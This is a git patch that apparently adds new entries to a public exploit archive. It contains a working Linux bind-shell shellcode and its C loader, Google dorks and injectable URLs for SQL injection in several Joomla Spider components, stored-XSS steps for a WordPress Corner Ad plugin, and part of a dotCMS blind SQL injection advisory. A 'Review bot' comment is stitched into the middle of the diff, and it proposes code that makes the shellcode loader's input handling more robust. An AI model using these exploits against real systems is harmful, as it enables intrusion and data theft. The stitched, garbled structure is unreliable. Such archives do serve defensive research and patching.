From 2f2ccec5c2d25d3cd0f4a4abf032fc2fa1204bc1 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 17 Feb 2017 05:01:19 +0000 Subject: [PATCH] DB: 2017-02-17 8 new exploits Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes) Joomla! Component 'com_spidercalendar' - SQL Injection Joomla! Component Spider Calendar - SQL Injection Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection Joomla! Component Spider Calendar 3.2.6 - SQL Injection Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection Joomla! Component 'com_spiderfaq' - SQL Injection Joomla! Component Spider FAQ - SQL Injection Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection Joomla! Component Spider Facebook 1.6.1 - SQL Injection Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting dotCMS 3.6.1 - Blind Boolean SQL Injection Joomla! 
Component JEmbedAll 1.4 - SQL Injection --- files.csv | 20 +- platforms/linux/shellcode/41375.c | 194 +++++++++++++++++ platforms/php/webapps/41371.txt | 19 ++ platforms/php/webapps/41372.txt | 19 ++ platforms/php/webapps/41373.txt | 17 ++ platforms/php/webapps/41374.txt | 17 ++ platforms/php/webapps/41376.txt | 44 ++++ platforms/php/webapps/41377.sh | 333 ++++++++++++++++++++++++++++++ platforms/php/webapps/41378.txt | 25 +++ 9 files changed, 682 insertions(+), 6 deletions(-) create mode 100755 platforms/linux/shellcode/41375.c create mode 100755 platforms/php/webapps/41371.txt create mode 100755 platforms/php/webapps/41372.txt create mode 100755 platforms/php/webapps/41373.txt create mode 100755 platforms/php/webapps/41374.txt create mode 100755 platforms/php/webapps/41376.txt create mode 100755 platforms/php/webapps/41377.sh create mode 100755 platforms/php/webapps/41378.txt diff --git a/files.csv b/files.csv index f8c24de5d..00b8574af 100644 --- a/files.csv +++ b/files.csv @@ -15896,6 +15896,7 @@ id,file,description,date,author,platform,type,port 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 +41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 
@@ -25777,7 +25778,7 @@ id,file,description,date,author,platform,type,port 20956,platforms/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps,0 20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 / 3.1.9 - Cross-Site Scripting",2012-08-31,"Mike Eduard",windows,webapps,0 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 -20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 +20983,platforms/php/webapps/20983.pl,"Joomla! Component Spider Calendar - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 
@@ -26201,7 +26202,7 @@ id,file,description,date,author,platform,type,port 22396,platforms/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22398,platforms/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0 -22403,platforms/php/webapps/22403.txt,"Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0 +22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22408,platforms/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0 22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0 
@@ -26704,7 +26705,7 @@ id,file,description,date,author,platform,type,port 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 -23782,platforms/php/webapps/23782.txt,"Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 +23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 
@@ -33630,7 +33631,7 @@ id,file,description,date,author,platform,type,port 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 34578,platforms/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php file Parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34571,platforms/php/webapps/34571.py,"Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 +34571,platforms/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 
@@ -33669,7 +33670,7 @@ id,file,description,date,author,platform,type,port 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80 -34625,platforms/php/webapps/34625.py,"Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 +34625,platforms/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps,0 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0 
@@ -34827,7 +34828,7 @@ id,file,description,date,author,platform,type,port 36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0 -36464,platforms/php/webapps/36464.txt,"Joomla! Component 'com_spiderfaq' - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 +36464,platforms/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 
@@ -37288,3 +37289,10 @@ id,file,description,date,author,platform,type,port 41361,platforms/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,hardware,webapps,0 41362,platforms/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0 41368,platforms/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0 +41371,platforms/php/webapps/41371.txt,"Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41372,platforms/php/webapps/41372.txt,"Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41373,platforms/php/webapps/41373.txt,"Joomla! Component Spider Facebook 1.6.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41374,platforms/php/webapps/41374.txt,"Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 +41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0 +41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80 +41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/linux/shellcode/41375.c b/platforms/linux/shellcode/41375.c new file mode 100755 index 000000000..de68e60d7 --- /dev/null +++ b/platforms/linux/shellcode/41375.c 
@@ -0,0 +1,194 @@ +/** + Copyright © 2017 Odzhan. All Rights Reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, + INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN + ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. 
*/
+
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+
+// bind shell for 32 and 64-bit Linux
+//
+#define BS_SIZE 156
+
+char BS[] = {
+ /* 0000 */ "\xb8\xfd\xff\xfb\x2d" /* mov eax, 0x2dfbfffd */
+ /* 0005 */ "\xbb\xff\xff\xff\xff" /* mov ebx, 0xffffffff */
+ /* 000A */ "\xf7\xd0" /* not eax */
+ /* 000C */ "\xf7\xd3" /* not ebx */
+ /* 000E */ "\x50" /* push rax */
+ /* 000F */ "\x50" /* push rax */
+ /* 0010 */ "\x54" /* push rsp */
+ /* 0011 */ "\x5f" /* pop rdi */
+ /* 0012 */ "\xab" /* stosd */
+ /* 0013 */ "\x93" /* xchg ebx, eax */
+ /* 0014 */ "\xab" /* stosd */
+ /* 0015 */ "\x54" /* push rsp */
+ /* 0016 */ "\x5d" /* pop rbp */
+ /* 0017 */ "\x31\xc0" /* xor eax, eax */
+ /* 0019 */ "\x99" /* cdq */
+ /* 001A */ "\xb0\x67" /* mov al, 0x67 */
+ /* 001C */ "\x6a\x01" /* push 0x1 */
+ /* 001E */ "\x5e" /* pop rsi */
+ /* 001F */ "\x6a\x02" /* push 0x2 */
+ /* 0021 */ "\x5f" /* pop rdi */
+ /* 0022 */ "\x48\x75\x24" /* jnz 0x49 */
+ /* 0025 */ "\xb0\x29" /* mov al, 0x29 */
+ /* 0027 */ "\x0f\x05" /* syscall */
+ /* 0029 */ "\x97" /* xchg edi, eax */
+ /* 002A */ "\x55" /* push rbp */
+ /* 002B */ "\x5e" /* pop rsi */
+ /* 002C */ "\xb2\x10" /* mov dl, 0x10 */
+ /* 002E */ "\xb0\x31" /* mov al, 0x31 */
+ /* 0030 */ "\x0f\x05" /* syscall */
+ /* 0032 */ "\x50" /* push rax */
+ /* 0033 */ "\x5e" /* pop rsi */
+ /* 0034 */ "\xb0\x32" /* mov al, 0x32 */
+ /* 0036 */ "\x0f\x05" /* syscall */
+ /* 0038 */ "\xb0\x2b" /* mov al, 0x2b */
+ /* 003A */ "\x0f\x05" /* syscall */
+ /* 003C */ "\x97" /* xchg edi, eax */
+ /* 003D */ "\x96" /* xchg esi, eax */
+ /* 003E */ "\xb0\x21" /* mov al, 0x21 */
+ /* 0040 */ "\x0f\x05" /* syscall */
+ /* 0042 */ "\x83\xee\x01" /* sub esi, 0x1 */
+ /* 0045 */ "\x79\xf7" /* jns 0x3e */
+ /* 0047 */ "\xeb\x2f" /* jmp 0x78 */
+ /* 0049 */ "\x56" /* push rsi */
+ /* 004A */ "\x5b" /* pop rbx */
+ /* 004B */ "\x52" /* push rdx */
+ /* 004C */ "\x53" /* push rbx */
+ /* 004D */ "\x57" /* push rdi */
+ /* 004E */ "\x54" /* push rsp */
+ /* 004F */ "\x59" /* pop rcx */
+ /* 0050 */ "\xcd\x80" /* int 0x80 */
+ /* 0052 */ "\x97" /* xchg edi, eax */
+ /* 0053 */ "\x5b" /* pop rbx */
+ /* 0054 */ "\x5e" /* pop rsi */
+ /* 0055 */ "\x6a\x10" /* push 0x10 */
+ /* 0057 */ "\x55" /* push rbp */
+ /* 0058 */ "\x57" /* push rdi */
+ /* 0059 */ "\xb0\x66" /* mov al, 0x66 */
+ /* 005B */ "\x89\xe1" /* mov ecx, esp */
+ /* 005D */ "\xcd\x80" /* int 0x80 */
+ /* 005F */ "\x89\x51\x04" /* mov [rcx+0x4], edx */
+ /* 0062 */ "\xb0\x66" /* mov al, 0x66 */
+ /* 0064 */ "\xb3\x04" /* mov bl, 0x4 */
+ /* 0066 */ "\xcd\x80" /* int 0x80 */
+ /* 0068 */ "\xb0\x66" /* mov al, 0x66 */
+ /* 006A */ "\x43\xcd\x80" /* int 0x80 */
+ /* 006D */ "\x6a\x02" /* push 0x2 */
+ /* 006F */ "\x59" /* pop rcx */
+ /* 0070 */ "\x93" /* xchg ebx, eax */
+ /* 0071 */ "\xb0\x3f" /* mov al, 0x3f */
+ /* 0073 */ "\xcd\x80" /* int 0x80 */
+ /* 0075 */ "\x49\x79\xf9" /* jns 0x71 */
+ /* 0078 */ "\x99" /* cdq */
+ /* 0079 */ "\x31\xf6" /* xor esi, esi */
+ /* 007B */ "\x50" /* push rax */
+ /* 007C */ "\x50" /* push rax */
+ /* 007D */ "\x50" /* push rax */
+ /* 007E */ "\x54" /* push rsp */
+ /* 007F */ "\x5b" /* pop rbx */
+ /* 0080 */ "\x53" /* push rbx */
+ /* 0081 */ "\x5f" /* pop rdi */
+ /* 0082 */ "\xc7\x07\x2f\x62\x69\x6e" /* mov dword [rdi], 0x6e69622f */
+ /* 0088 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */
+ /* 008F */ "\x40\x75\x04" /* jnz 0x96 */
+ /* 0092 */ "\xb0\x3b" /* mov al, 0x3b */
+ /* 0094 */ "\x0f\x05" /* syscall */
+ /* 0096 */ "\x31\xc9" /* xor ecx, ecx */
+ /* 0098 */ "\xb0\x0b" /* mov al, 0xb */
+ /* 009A */ "\xcd\x80" /* int 0x80 */
+};
+
+void bin2file(void *p, int len)
+{
+ FILE *out = fopen("rs.bin", "wb");
+ if (out!= NULL)
+ {
+ fwrite(p, 1, len, out);
+ fclose(out);
+ }
+}
+
+void xcode(char *s, int len, uint32_t ip, int16_t port)
+{
+ uint8_t *p;
+
+ p=(uint8_t*)mmap (0, len,
+ PROT_EXEC | PROT_WRITE | PROT_READ,
+ MAP_ANON | MAP_PRIVATE, -1, 0);
+
+ memcpy(p, s, len);
+ memcpy((void*)&p[3], &port, 2); // set the port
+ memcpy((void*)&p[6], &ip, 4); // set the ip
+
+ //bin2file(p, len);
+
+ // execute
+ ((void(*)())p)();
+
+ munmap ((void*)p, len);
+}
+
+int main(int argc, char *argv[])
+{
+ uint32_t ip = 0;
+ int16_t port = 0;
+
+ if (argc < 2) {
+ printf ("\nbs_test \n");
+ return 0;
+ }
+ port = atoi(argv[1]);
+
+ if (port<0 || port>65535) {
+ printf ("\ninvalid port specified\n");
+ return 0;
+ }
+ port = htons(port);
+
+ // optional ip address?
+ if (argc > 2) {
+ ip = inet_addr(argv[2]);
+ }
+ // invert both to mask null bytes.
+ // obviously no rigorous checking here
+ ip = ~ip;
+ port = ~port;
+
+ xcode (BS, BS_SIZE, ip, port);
+ return 0;
+}
+
diff --git a/platforms/php/webapps/41371.txt b/platforms/php/webapps/41371.txt
new file mode 100755
index 000000000..9f493fd9d
--- /dev/null
+++ b/platforms/php/webapps/41371.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Spider Calendar Lite v3.2.16 - SQL Injection
+# Google Dork: inurl:index.php?option=com_spidercalendar
+# Date: 16.02.2017
+# Vendor Homepage: http://web-dorado.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/spider-calendar-lite/
+# Demo: http://demo.web-dorado.com/spider-calendar.html
+# Version: 3.2.16
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41372.txt b/platforms/php/webapps/41372.txt
new file mode 100755
index 000000000..095dfa968
--- /dev/null
+++ b/platforms/php/webapps/41372.txt
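Review bot: The port validation in main() of 41375.c cannot do what it claims: `port` is declared `int16_t`, so `port>65535` is always false, any value from 32768 to 65535 wraps negative and is rejected by `port<0`, and `atoi` silently accepts trailing garbage and returns 0 for non-numeric input, which then passes the check. Parsing with strtol into a long, range-checking that value, and only then narrowing to `uint16_t` fixes both; the `int16_t port` parameter of xcode() should be changed to match. In xcode() the mmap() result is also used without a `MAP_FAILED` test, so an allocation failure hands an invalid pointer to memcpy; `if (p == MAP_FAILED) { perror("mmap"); return; }` before the copies covers it. The `#include` lines appear here without header names, which looks like an extraction artifact rather than the committed source, so whether `<errno.h>` is already included cannot be confirmed from this hunk.
```c
int main(int argc, char *argv[])
{
    uint32_t ip = 0;
    uint16_t port = 0;   /* was int16_t: the old range test could never fire */
    // … unchanged: usage check …
    errno = 0;
    char *end = NULL;
    long v = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE || v < 1 || v > 65535) {
        printf ("\ninvalid port specified\n");
        return 0;
    }
    port = htons((uint16_t)v);
    // … unchanged: optional ip, inversion to mask null bytes, xcode call …
```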
@@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection +# Google Dork: inurl:index.php?option=com_spidercatalog +# Date: 16.02.2017 +# Vendor Homepage: http://web-dorado.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/ +# Demo: http://demo.web-dorado.com/spider-catalog.html +# Version: 1.8.10 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL] +# +http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1 +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41373.txt b/platforms/php/webapps/41373.txt new file mode 100755 index 000000000..5cf9832de --- /dev/null +++ b/platforms/php/webapps/41373.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Spider Facebook v1.6.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_spiderfacebook +# Date: 16.02.2017 +# Vendor Homepage: http://web-dorado.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-display/spider-facebook/ +# Demo: http://demo.web-dorado.com/spider-facebook.html +# Version: 1.6.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_spiderfacebook&task=loginwith&name=[SQL] +# # # # # \ No newline at end of file 
diff --git a/platforms/php/webapps/41374.txt b/platforms/php/webapps/41374.txt new file mode 100755 index 000000000..9538a4ab8 --- /dev/null +++ b/platforms/php/webapps/41374.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_spiderfaq +# Date: 16.02.2017 +# Vendor Homepage: http://web-dorado.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/ +# Demo: http://demo.web-dorado.com/spider-faq.html +# Version: 1.3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL] +# # # # # diff --git a/platforms/php/webapps/41376.txt b/platforms/php/webapps/41376.txt new file mode 100755 index 000000000..a0fec5d2a --- /dev/null +++ b/platforms/php/webapps/41376.txt 
@@ -0,0 +1,44 @@ +# Exploit Title: Authorized Stored XSS at WordPress Corner-Ad plugin. +# Google Dork: inurl:/wp-content/plugins/corner-ad +# Date: 16-02-17 +# Exploit Author: Atik Rahman +# Vendor Homepage: https://wordpress.org/plugins/corner-ad/ +# Software Link: https://downloads.wordpress.org/plugin/corner-ad.zip +# Version: 1.0.7 +# Tested on: Firefox 44, Windows10 + + +Vendor Description +--------------------- + +*Corner Ad* is a plugin which display you ads in a corner of your +WordPress website page. + +The Plugin has 1,000+ active install. + + +Stored XSS in Ad Name +---------------------- + +Ad name input fields aren't properly escaped. This +could lead to an XSS attack that could possibly affect +administrators,users,editor. + + + + +1. Go to http://localhost/wp-admin/options-general.php?page=corner-ad.php + +2. Click on create new Add button. + +3. And Use Ad name as "/> *Fill +the other field. + +4.Now Click on save corner Add button when it's add a new add go to the +http://localhost/wp-admin/options-general.php?page=corner-ad.php +for corner add list. And now Your xss will + +be executed. + +5. If a normal editor,author visit the corner add list page xss will +effect them also. diff --git a/platforms/php/webapps/41377.sh b/platforms/php/webapps/41377.sh new file mode 100755 index 000000000..8d63c2d25 --- /dev/null +++ b/platforms/php/webapps/41377.sh 
@@ -0,0 +1,333 @@ +: ' +# Blind Boolean SQL Injection in dotCMS <= 3.6.1 (CVE-2017-5344) + +## Product Description + +dotCMS is a scalable, java based, open source content management system +(CMS) that has been designed to manage and deliver personalized, permission +based content experiences across multiple channels. dotCMS can serve as the +plaform for sites, mobile apps, mini-sites, portals, intranets or as a +headless CMS (content is consumed via RESTful APIs). dotCMS is used +everywhere, from running small sites to powering multi-node installations +for governemnts, Fortune 100 companies, Universities and Global Brands. A +dotCMS environment can scale to support hundreds of editors managing +thousands of sites with millions of content objects. + +## Vulnerability Type + +Blind Boolean SQL injection + +## Vulnerability Description + +dotCMS versions up to 3.6.1 (and possibly others) are vulnerable to blind +boolean SQL injection in the q and inode parameters at the +/categoriesServlet path. This servlet is a remotely accessible, +unauthenticated function of default dotCMS installations and can be +exploited to exfiltrate sensitive information from databases accessible to +the DMBS user configured with the product. + +Exploitation of the vulnerability is limited to the MySQL DMBS in 3.5 - +3.6.1 as SQL escaping controls were added to address a similar +vulnerability discovered in previous versions of the product. The means of +bypassing these features which realise this vulnerability have only been +successfully tested with MySQL 5.5, 5.6 and 5.7 and it is believed other +DMBSes are not affected. Versions prior to 3.6 do not have these controls +and can be exploited directly on a greater number of paired DMBSes. +PostgreSQL is vulnerable in all described versions of dotCMS when +PostgreSQL standard_confirming_strings setting is disabled (enabled by +default). 
+ +The vulnerability is the result of string interpolation and directly SQL +statement execution without sanitising user input. The intermediate +resolution for a previous SQLi vulnerability was to whitelist and partially +filter user input before interpolation. This vulnerability overcomes this +filtering to perform blind boolean SQL injection. The resolution to this +vulnerability was to implement the use of prepared statements in the +affected locations. + +This vulnerability has been present in dotCMS since at least since version +3.0. + +## Exploit + +A proof of concept is available here: +https://github.com/xdrr/webapp-exploits/tree/master/vendors/dotcms/2017.01.blind-sqli + +## Versions + +dotCMS <= 3.3.2 and MYSQL, MSSQL, H2, PostgreSQL + +dotCMS 3.5 - 3.6.1 and (MYSQL or PostgreSQL w/ standard_confirming_strings +disabled) + +## Attack Type + +Unauthenticated, Remote + +## Impact + +The SQL injection vulnerability can be used to exfiltrate sensitive +information from the DBMS used with dotCMS. Depending of the DBMS +configuration and type, the issue could be as severe as establishing a +remote shell (such as by using xp_exec on MSSQL servers) or in the most +limited cases, restricted only to exfiltration of data in dotCMS database +tables. + +## Credit + +This vulnerability was discovered by Ben Nott . + +Credit goes to Erlar Lang for discovering similar SQL injection +vulnerabilities in nearby code and for inspiring this discovery. + +## Disclosure Timeline + + * Jan 2, 2017 - Issue 